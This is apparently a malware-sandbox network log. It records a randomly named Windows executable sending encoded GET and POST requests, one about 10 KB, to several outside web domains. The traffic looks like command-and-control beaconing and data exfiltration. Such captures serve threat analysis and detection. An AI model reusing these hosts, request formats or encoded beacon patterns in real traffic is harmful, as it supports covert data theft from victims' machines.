                                                          Date: Wed, 03 Jul 2024 13:59:04 GMT
                                                          Server: Apache
                                                          Content-Encoding: gzip
                                                          Data Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d [TRUNCATED]
                                                          Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0


                                                          Session ID: 36 | Source IP: 192.168.2.4 | Source Port: 49773 | Destination IP: 217.160.0.119 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp: Jul 3, 2024 15:59:06.163959026 CEST | Bytes transferred: 464 | Direction: OUT | Data:
                                                          GET /ndwb/?TvpPfhGp=/qyS5uFMStFKGiC7gxlopLbluV61vu+RjDYXbeo3nHi2h/5APNXwWrEdkOsmqUKqQbrnCVB7EyQd8x04JYqB6drGuaM8rj1nd0RRI3hUZH7sElvU+ZecVtI=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.qrdinamicos.com
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Timestamp: Jul 3, 2024 15:59:06.803212881 CEST | Bytes transferred: 740 | Direction: IN | Data:
                                                          HTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Content-Length: 596
                                                          Connection: close
                                                          Date: Wed, 03 Jul 2024 13:59:06 GMT
                                                          Server: Apache
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>


                                                          Session ID: 37 | Source IP: 192.168.2.4 | Source Port: 49774 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp: Jul 3, 2024 15:59:11.888911009 CEST | Bytes transferred: 720 | Direction: OUT | Data:
                                                          POST /42ua/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.g2m-os.com
                                                          Origin: http://www.g2m-os.com
                                                          Referer: http://www.g2m-os.com/42ua/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 33 34 53 67 66 74 56 50 6a 37 4d 67 4d 72 66 35 69 57 65 68 77 68 4f 4e 6b 37 33 50 6d 52 55 39 6b 56 37 63 79 56 6d 67 75 33 4f 47 69 41 70 4f 49 57 4d 43 2b 4b 64 68 74 6b 74 70 73 76 56 33 34 74 58 5a 5a 78 5a 50 78 62 4c 45 30 7a 41 64 77 6a 64 37 68 78 68 38 52 70 6a 32 33 4d 4c 56 30 68 51 68 44 36 4d 7a 50 79 35 58 58 46 33 66 32 4b 35 68 4f 35 36 32 46 4e 67 73 2f 68 50 38 39 79 41 36 38 39 4a 68 4b 5a 74 4b 4b 49 58 62 36 69 6e 79 6e 49 72 57 36 55 6b 45 73 43 46 37 47 6e 77 58 56 71 6a 73 6f 2b 50 67 6f 6c 2f 4a 55 30 50 7a 31 66 4f 4b 51 78 4d 36 57 33 61 64 50 41 3d 3d
                                                          Data Ascii: TvpPfhGp=34SgftVPj7MgMrf5iWehwhONk73PmRU9kV7cyVmgu3OGiApOIWMC+KdhtktpsvV34tXZZxZPxbLE0zAdwjd7hxh8Rpj23MLV0hQhD6MzPy5XXF3f2K5hO562FNgs/hP89yA689JhKZtKKIXb6inynIrW6UkEsCF7GnwXVqjso+Pgol/JU0Pz1fOKQxM6W3adPA==


                                                          Session ID: 38 | Source IP: 192.168.2.4 | Source Port: 49775 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp: Jul 3, 2024 15:59:14.556703091 CEST | Bytes transferred: 740 | Direction: OUT | Data:
                                                          POST /42ua/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.g2m-os.com
                                                          Origin: http://www.g2m-os.com
                                                          Referer: http://www.g2m-os.com/42ua/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 33 34 53 67 66 74 56 50 6a 37 4d 67 4b 37 76 35 6b 78 43 68 33 42 4f 4d 6f 62 33 50 73 78 55 35 6b 56 33 63 79 56 50 34 75 6c 71 47 68 68 5a 4f 4a 58 4d 43 39 4b 64 68 6a 45 74 31 6a 50 56 43 34 74 4b 73 5a 77 6c 50 78 62 66 45 30 79 77 64 77 77 31 36 68 68 68 69 49 35 6a 77 39 73 4c 56 30 68 51 68 44 2b 6b 4e 50 78 4a 58 58 31 48 66 33 76 56 67 48 5a 36 31 43 4e 67 73 74 52 50 77 39 79 41 49 38 35 6f 45 4b 62 46 4b 4b 49 6e 62 36 33 4c 31 6f 49 72 51 2b 55 6b 52 70 68 70 32 47 6e 68 59 56 4b 7a 78 71 4e 48 66 74 6a 75 54 46 46 75 6b 6e 66 71 35 4e 32 46 4f 62 30 6e 55 55 4d 62 2f 67 55 65 46 62 53 36 4b 45 61 6e 44 72 64 62 55 32 78 49 3d
                                                          Data Ascii: TvpPfhGp=34SgftVPj7MgK7v5kxCh3BOMob3PsxU5kV3cyVP4ulqGhhZOJXMC9KdhjEt1jPVC4tKsZwlPxbfE0ywdww16hhhiI5jw9sLV0hQhD+kNPxJXX1Hf3vVgHZ61CNgstRPw9yAI85oEKbFKKInb63L1oIrQ+UkRphp2GnhYVKzxqNHftjuTFFuknfq5N2FOb0nUUMb/gUeFbS6KEanDrdbU2xI=


                                                          Session ID: 39 | Source IP: 192.168.2.4 | Source Port: 49776 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp: Jul 3, 2024 15:59:17.155595064 CEST | Bytes transferred: 10822 | Direction: OUT | Data:
                                                          POST /42ua/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.g2m-os.com
                                                          Origin: http://www.g2m-os.com
                                                          Referer: http://www.g2m-os.com/42ua/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 33 34 53 67 66 74 56 50 6a 37 4d 67 4b 37 76 35 6b 78 43 68 33 42 4f 4d 6f 62 33 50 73 78 55 35 6b 56 33 63 79 56 50 34 75 6c 69 47 68 54 52 4f 49 30 30 43 38 4b 64 68 72 6b 74 32 6a 50 56 62 34 74 53 6f 5a 77 70 31 78 59 6e 45 79 51 49 64 6c 78 31 36 76 68 68 69 56 70 6a 31 33 4d 4c 36 30 6c 30 62 44 36 34 4e 50 78 4a 58 58 33 76 66 6a 4b 35 67 4c 35 36 32 46 4e 67 65 2f 68 50 63 39 79 59 79 38 35 74 78 4b 4c 6c 4b 4e 73 44 62 2f 42 66 31 33 34 72 53 35 55 6c 55 70 68 6b 32 47 6d 4e 36 56 4a 76 4c 71 4b 48 66 74 69 44 66 51 52 7a 7a 6c 73 43 32 52 78 78 58 5a 6c 48 4b 55 75 44 2b 78 30 75 44 48 32 37 6e 46 72 66 54 2f 75 44 56 68 46 4d 6e 57 63 54 58 56 79 46 56 56 77 53 49 35 63 46 32 46 55 2b 2b 74 50 41 36 77 64 45 6b 73 2f 73 65 53 32 73 5a 67 4f 55 58 6a 45 48 75 2f 6f 64 7a 63 43 35 63 53 31 51 4b 76 75 39 6b 30 66 69 49 35 70 33 72 61 47 56 4e 73 4f 42 55 6d 71 74 4f 2f 78 65 74 77 30 69 78 44 78 6e 74 4e 42 4a 41 53 68 76 62 61 34 4b 69 77 32 4a 4c 69 6a 54 68 4e [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=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 [TRUNCATED]


                                                          Session ID: 40 | Source IP: 192.168.2.4 | Source Port: 49777 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp: Jul 3, 2024 15:59:19.703322887 CEST | Bytes transferred: 459 | Direction: OUT | Data:
                                                          GET /42ua/?TvpPfhGp=666AcZt0vqUScrmitGmo0Sn7ionns3Mbllq+uEGn7nXx6ARBAUIN9tdRik4SosB3sd2YOi8W6KuCii1PvQhz+VFeXf3qlNf5sD8BLIsMKCpTeSvGwI45HLM=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.g2m-os.com
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Timestamp: Jul 3, 2024 15:59:20.161262035 CEST | Bytes transferred: 400 | Direction: IN | Data:
                                                          HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Wed, 03 Jul 2024 13:59:20 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 260
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 54 76 70 50 66 68 47 70 3d 36 36 36 41 63 5a 74 30 76 71 55 53 63 72 6d 69 74 47 6d 6f 30 53 6e 37 69 6f 6e 6e 73 33 4d 62 6c 6c 71 2b 75 45 47 6e 37 6e 58 78 36 41 52 42 41 55 49 4e 39 74 64 52 69 6b 34 53 6f 73 42 33 73 64 32 59 4f 69 38 57 36 4b 75 43 69 69 31 50 76 51 68 7a 2b 56 46 65 58 66 33 71 6c 4e 66 35 73 44 38 42 4c 49 73 4d 4b 43 70 54 65 53 76 47 77 49 34 35 48 4c 4d 3d 26 59 36 36 34 47 3d 53 74 74 44 65 6e 39 38 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?TvpPfhGp=666AcZt0vqUScrmitGmo0Sn7ionns3Mbllq+uEGn7nXx6ARBAUIN9tdRik4SosB3sd2YOi8W6KuCii1PvQhz+VFeXf3qlNf5sD8BLIsMKCpTeSvGwI45HLM=&Y664G=SttDen986"}</script></head></html>


                                                          Session ID: 41 | Source IP: 192.168.2.4 | Source Port: 49778 | Destination IP: 162.241.2.92 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp: Jul 3, 2024 15:59:25.505705118 CEST | Bytes transferred: 738 | Direction: OUT | Data:
                                                          POST /j5qz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.vendasnaweb1.com
                                                          Origin: http://www.vendasnaweb1.com
                                                          Referer: http://www.vendasnaweb1.com/j5qz/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 39 42 39 42 70 55 72 70 63 6f 69 36 6d 4f 75 64 2f 55 6c 54 78 2f 51 31 6e 59 62 4a 46 7a 57 7a 6d 61 46 39 47 4a 62 50 34 44 58 58 35 35 63 44 30 70 50 6b 39 35 43 55 34 6a 4d 65 72 76 48 78 67 34 51 79 36 52 38 2f 55 6f 75 62 31 4c 75 42 77 45 71 2f 43 54 48 68 77 58 6c 5a 31 6f 77 5a 78 63 45 42 72 34 76 4a 4a 53 45 78 37 6a 31 52 79 33 6b 2b 67 56 64 4d 31 35 74 63 36 4a 43 38 74 52 4c 36 58 72 62 72 4b 39 77 63 35 78 43 39 6c 6f 68 73 43 2f 56 45 4f 30 73 5a 50 61 4d 50 34 33 2b 78 4f 52 47 52 61 32 52 5a 66 6f 79 46 2b 32 7a 42 6b 6f 37 37 39 35 4c 6e 36 72 54 32 50 41 3d 3d
                                                          Data Ascii: TvpPfhGp=9B9BpUrpcoi6mOud/UlTx/Q1nYbJFzWzmaF9GJbP4DXX55cD0pPk95CU4jMervHxg4Qy6R8/Uoub1LuBwEq/CTHhwXlZ1owZxcEBr4vJJSEx7j1Ry3k+gVdM15tc6JC8tRL6XrbrK9wc5xC9lohsC/VEO0sZPaMP43+xORGRa2RZfoyF+2zBko7795Ln6rT2PA==
                                                          Timestamp: Jul 3, 2024 15:59:26.271322966 CEST | Bytes transferred: 1236 | Direction: IN | Data:
                                                          HTTP/1.1 404 Not Found
                                                          Date: Wed, 03 Jul 2024 13:59:25 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          X-Newfold-Cache-Level: 2
                                                          X-Endurance-Cache-Level: 2
                                                          X-nginx-cache: WordPress
                                                          Content-Length: 16449
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 b9 91 2d fa bb b4 96 df 01 c5 5a 6e 91 dd 04 bf 29 a9 92 a2 ec fe f4 f8 5c b7 db d3 d5 9e b9 e7 76 f7 aa 83 4c 04 33 51 42 02 69 00 49 8a 45 eb 61 ce ba 6f 71 ff ce 8b dd 40 26 bf 99 94 28 95 c6 9e 33 ac 12 09 04 22 76 ec d8 b1 af 5f 7f f3 c3 d7 3f fd cf bf 7c 4b 12 97 ca 9b b3 6b ff 43 24 53 f1 b8 96 39 fa d5 8f 35 1f 03 c6 6f ce 5e 5d a7 e0 18 89 12 66 2c b8 71 ed af 3f 7d 47 af 6a a4 bd 7e 51 2c 85 71 6d 2a 60 96 69 e3 6a 24 d2 ca 81 c2 cc 99 e0 2e 19 73 98 8a 08 68 71 69 12 a1 84 13 4c 52 1b 31 09 e3 6e 81 b3 05 73 6e 74 a8 9d 3d 5f 83 9c a7 ec 8e 8a 94 c5 40 33 03 be 49 20 99 89 e1 bc 28 74 c2 49 b8 f9 cb 7f fc ef 58 28 44 f8 8f ff 57 13 50 be d4 30 ce c8 67 6f ae 7a dd ee 88 7c 0f 39 b1 c2 c1 75 bb cc 3f bb 96 42 dd 12 03 72 7c ce 95 f5 c0 13 70 51 72 4e 12 3c 8d cf db ed 29 28 ce ac 62 33 08 bb ad 48 a7 65 b7 75 55 8d 49 07 46 31 07 35 e2 e6 19 4e cf b2 4c 8a 88 39 a1 55 db 58 fb c5 5d 2a f1 c9 77 1b d7 be 03 e0 24 63 86 ad 89 90 cf 0c fb 5b ae 47 [TRUNCATED]
                                                          Data Ascii: v#-Zn)\vL3QBiIEaoq@&(3"v_?|KkC$S95o^]f,q?}Gj~Q,qm*`ij$.shqiLR1nsnt=_@3I (tIX(DWP0goz|9u?Br|pQrN<)(b3HeuUIF15NL9UX]*w$c[Ga-q.aKOnLQFhL216+P\Zgx[2&Z,ZKf-m_j/nvQK;luZ_/Zw[b@oK@<M`QCE,BE2[2;`73h[kS",Y4A|>{=UwYMXL!i0ZITyg6't"K`FAFkd?LkjYp?u7'&k4Q(:G\4.wN-]wrB~Kc9E"wvtcbiONbpQM05G
                                                          Timestamp: Jul 3, 2024 15:59:26.271352053 CEST | Bytes transferred: 1236 | Direction: IN | Data Raw: 18 8f c7 e6 67 f7 eb 7d 63 23 70 be 12 d8 ce 84 97 1f b3 23 74 54 6d 22 59 5c 0b 96 85 1e a6 f6 4b ce af fa 11 7e 4f 26 fd 5f f2 09 74 26 bf e4 bd 4e 87 e3 f7 05 bb 2c 23 b5 a3 69 e1 4e 5a e3 77 af bb c1 eb 5d 58 3e 61 5b e7 7e 6d ff a9 04 d9 4a
                                                          Data Ascii: g}c#p#tTm"Y\K~O&_t&N,#iNZw]X>a[~mJh|}f..p{" `XX`kRzknXxO%BwjSfra"g'C&E:> 'D(*S~db#.Zw:DRP^+
                                                          Timestamp: Jul 3, 2024 15:59:26.271365881 CEST | Bytes transferred: 1236 | Direction: IN | Data Raw: 4f fa 30 74 8c b4 b2 63 a8 c5 63 b5 7d 1e 81 cd 58 8c f3 0b eb 8e 41 2b 36 15 31 73 42 2b d2 3a ac 5a 14 b2 52 1c 2a b5 c1 94 99 3a dd 2a a0 e8 48 9d 2f a5 6f 0a 25 9c 60 b2 31 0a 59 74 1b 17 22 d3 1d 01 46 2b 13 4f 24 dc 8d fc 17 e5 c2 40 e4 a1
                                                          Data Ascii: O0tcc}XA+61sB+:ZR*:*H/o%`1Yt"F+O$@b36EhlCnC%uGB,"bw-X(*6tyD2`EmoTBnf|$.IyNIqin+anFm&H 28"{
                                                          Timestamp: Jul 3, 2024 15:59:26.271436930 CEST | Bytes transferred: 1236 | Direction: IN | Data Raw: 99 61 2a 02 34 26 1a 87 c9 d1 56 48 69 05 a3 c3 21 df 0e fc bf 92 5e 6c f4 2c e8 8e b6 1d d0 59 dd 4c b9 cb ad 85 f4 0d ee 60 a5 cf 15 2e a7 90 9b 43 a4 0d 73 42 ab 20 57 16 dc 6b 91 66 da 38 a6 dc 01 ff 63 bb a0 5a c9 39 39 6a d0 82 aa 4d 8c 50
                                                          Data Ascii: a*4&VHi!^l,YL`.CsB Wkf8cZ99jMPzk?3#)|L.6oQ#-i|r=Km4l9^iynY/9dVB~<_OvXNHN9#>.H=6La%/_uKlp(e&*1E
                                                          Timestamp: Jul 3, 2024 15:59:26.271450043 CEST | Bytes transferred: 896 | Direction: IN | Data Raw: 3f 53 6a e2 30 e8 34 bb bd 41 b3 7b 75 71 2c 8b 33 73 0b 86 76 3b 1e ee 22 64 dd 47 13 d7 c0 9d cb 66 f7 e2 b1 fc 5e 01 3c 64 57 97 8f 26 ae 80 df 22 76 7f b8 9d 5e 5a 84 16 5b a5 13 1d e5 36 e8 65 77 65 46 a9 9e 9d ab c8 fb be 14 e6 92 75 3a 7c
                                                          Data Ascii: ?Sj04A{uq,3sv;"dGf^<dW&"v^Z[6eweFu:|rf_}.(o/S'bj;U}h,VTAfw-+G9Qn,P8nGTi2t/VW%%y)H+ah8q46lN7.]7pwu2@=<Nj
                                                          Timestamp: Jul 3, 2024 15:59:26.271465063 CEST | Bytes transferred: 1236 | Direction: IN | Data Raw: 1f 3a b1 ba f0 ef 7e 7d 19 3c 11 21 d4 ce e9 74 1f 62 19 3d 11 c3 4b bf 8f 50 c4 4e ac 2f a4 fe f5 39 ca ed 55 3e 59 b9 bd fa e7 28 b7 07 f1 0c e5 f6 10 1e 54 4e a4 f1 cf 91 64 d6 7e 3e 9e 65 54 a4 2c 06 8a a5 4b bb 17 6e 4d d9 5d 09 e9 fd fa db
                                                          Data Ascii: :~}<!tb=KPN/9U>Y(TNd~>eT,KnM]eD"e&*BeaipB+$ ycA)a<.Bf&OO&\0e~$dw#620I}Cs/E7gR[b@M9||&*'utkiD04$&,h8 "M
                                                          Timestamp: Jul 3, 2024 15:59:26.271478891 CEST | Bytes transferred: 1236 | Direction: IN | Data Raw: e8 65 c1 aa f0 08 76 af c0 ee b7 7a 97 c7 c0 27 2c 15 72 4e 69 a8 f9 3c 20 b5 3f 2a 07 a6 d6 24 96 29 4b 2d 18 31 79 a8 28 01 dc b1 8a 03 f2 35 33 5c 3f 94 69 e7 d6 41 4a 37 b0 01 a1 2c cb 24 2c 5f 9a e4 2b f4 cd ed f7 2c 7a 57 dc bf c3 e2 26 61
                                                          Data Ascii: evz',rNi< ?*$)K-1y(53\?iAJ7,$,_+,zW&aSPwRXE$ D0#{)H$s&1mD&Os$G=c 9y~!`Zq[0S!O"K3NjoXMN&2Hbx/Rm?yj7X+H
                                                          Jul 3, 2024 15:59:26.271492004 CEST1236INData Raw: 2b c0 78 01 4f e8 13 24 7a 0a 66 71 80 a1 b4 2f 4f ba 4d 92 f4 f0 af 8f 7f 03 fc 1b e2 df c5 13 b8 3d c5 4c 09 30 af 60 e3 51 33 f4 3c b1 c5 a9 ae bb bb a3 92 99 18 1a fb 30 dd 21 e2 f4 4e c7 59 c1 dc 27 fd 93 8b d6 25 83 ed 92 48 b2 34 ab 23 03
                                                          Data Ascii: +xO$zfq/OM=L0`Q3<0!NY'%H4#iRw3BI@|OOnyQsqrMXr&Pvy],Fmj}o}2Lp3z2d<)TF*#n.1_i]]1MNq3cFTU;
                                                          Jul 3, 2024 15:59:26.271711111 CEST1236INData Raw: 1d 01 2e fb 53 da 6c 60 2a 7a 80 f4 8b 14 91 cf b7 f6 93 fa ec 42 55 f4 4a 05 57 2b 1f 3f bb cb 0a a4 02 7f 9d d4 fd a4 0e 1b 98 87 7a f4 5e a6 47 ef a1 1e fd 97 e9 d1 7f a8 c7 e0 65 7a 0c 1e ea 31 7c 99 1e c3 87 7a 5c bc 4c 8f 8b 87 7a 5c be 4c
                                                          Data Ascii: .Sl`*zBUJW+?z^Gez1|z\Lz\Lz\Lz}oLn.}K*II'tHgXU=8'G59_l(Lg.4Rj31yvHg-,nbS3'*g
                                                          Jul 3, 2024 15:59:26.271724939 CEST328INData Raw: d6 3f 39 f1 9f a2 4b b7 73 52 d2 3f 87 5b f7 a4 a4 ff 8c ad 0d 4e 4e fc e7 28 d3 3b 29 e9 9f c3 ad ca f1 87 49 9f b8 b5 03 c0 aa 8d 1d 26 2d 3e e4 d6 89 c9 bc c8 04 e5 02 af 05 d0 10 dc 0c e0 49 63 97 7c ed 36 fa 69 59 e5 e0 33 83 ab 51 da ff 94
                                                          Data Ascii: ?9KsR?[NN(;)I&->Ic|6iY3Q !EBWWUvE.xuU{IX0K@]}sZ5M8-8f]ctvn.%$:C&joEFPT(=9;{~j8;G*-"z5w1D(d
                                                          Jul 3, 2024 15:59:26.276340961 CEST1236INData Raw: 72 bb d4 82 45 b7 de 95 8a 97 cb 08 c8 1b 00 d8 12 86 e5 4e ef 33 da 92 44 69 b5 cc 5e 56 0f 06 83 e2 ce 85 c5 55 cd 03 52 6c ae 08 4d 70 cd d4 8a 8f 80 c3 40 ba 23 a1 ef 52 04 24 4c f0 3a 5c ce 5a ac 76 95 53 4e bb ab 61 17 33 49 af 8f 5f dd c1
                                                          Data Ascii: rEN3Di^VURlMp@#R$L:\ZvSNa3I_OH9YzGt;O##2G,h8 "v&sHm]6E(MT}^y.`)h6s!y;wBM>V55A?h[hm:~ SxCe9!


                                                          Session ID: 42 | Source IP: 192.168.2.4 | Source Port: 49779 | Destination IP: 162.241.2.92 | Destination Port: 80 | PID: 1908 | Process: C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 3, 2024 15:59:28.035813093 CEST | 758 | OUT | POST /j5qz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
